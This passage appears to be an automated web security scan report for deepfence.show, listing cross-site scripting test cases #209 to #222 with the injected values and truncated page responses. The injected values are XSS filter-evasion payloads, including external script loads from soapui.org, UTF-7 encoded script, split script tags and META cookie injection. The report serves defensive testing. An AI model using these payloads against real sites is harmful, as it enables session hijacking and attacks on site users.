href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/z8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #209\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io <SCRIPT SRC=\"http://soapui.org/xss.jpg\"></SCRIPT>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #210\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Valuedemouser@deepfence.io <? echo('<SCR)';echo('IPT>alert(\"XSS\")</SCRIPT>'); ?\n>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #211\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io <IMG SRC=\"http://soapui.org/somecommand.php?\nsomevariables=maliciouscode\">\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]Action Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #212\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io Redirect 302 /a.jpg http://soapui.org/admin.asp&\ndeleteuser\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #213\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io <META HTTP-EQUIV=\"Set-Cookie\" Content=\"USERID=&lt;\nSCRIPT&gt;alert('XSS')&lt;/SCRIPT&gt;\">\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #214\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io <HEAD><META HTTP-EQUIV=\"CONTENT-TYPE\" CONTENT\n=\"text/html; charset=UTF-7\"> </HEAD>+ADw-SCRIPT+AD4-\nalert('XSS');+ADw-/SCRIPT+AD4-\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #215Scan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io <SCRIPT a=\">\" SRC=\"http://soapui.org/xss.js\"></\nSCRIPT>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #216\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io <SCRIPT =\">\" SRC=\"http://soapui.org/xss.js\"></\nSCRIPT>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #217\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io <SCRIPT a=\">\" '' SRC=\"http://soapui.org/xss.js\"></\nSCRIPT>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #218\nScan Cross Site Scripting\nSeverity ERROREndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io <SCRIPT \"a='>'\" SRC=\"http://soapui.org/xss.js\"></\nSCRIPT>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #219\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io <SCRIPT a=`>` SRC=\"http://soapui.org/xss.js\"></\nSCRIPT>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #220\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io <SCRIPT a=\">'>\" SRC=\"http://soapui.org/xss.js\"></\nSCRIPT>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #221\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GETModified \nParametersName Value\ndemouser@deepfence.io <SCRIPT>document.write(\"<SCRI\");</SCRIPT>PT SRC=\"\nhttp://soapui.org/xss.js\"></SCRIPT>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #222\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <PLAINTEXT>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" 